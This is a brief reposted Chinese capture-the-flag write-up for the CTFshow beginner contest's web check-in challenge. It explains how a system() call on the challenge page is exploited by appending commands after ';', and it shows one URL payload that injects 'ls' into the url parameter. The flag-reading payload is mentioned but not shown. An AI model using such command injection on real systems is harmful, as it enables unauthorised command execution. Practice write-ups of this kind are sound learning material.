CTFshow萌新賽-web簽到

本文轉載自查看原文 2020-03-08 10:32 637 CTF

打開靶機

查看頁面信息

可以看到有一個system函數

在Linux中可以使用“；”隔離不同的語句

payload如下

https://5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show/?url=5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show;ls;ping www

使用同樣的方法查看flag文件內容

payload

成功拿到flag

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CTFshow-萌新賽雜項_簽到 CTFshow萌新計划-Web（二） CTFshow萌新計划-Web（三） CTFshow萌新計划-Web（一） CTFshow-萌新賽逆向_簽退 CTFshow 萌新計划web1-8 ctfshow-pwn新手/萌新賽 CTFshow-萌新賽雜項_勸退警告 ctfshow—web—web簽到題 ctfshow——web_AK賽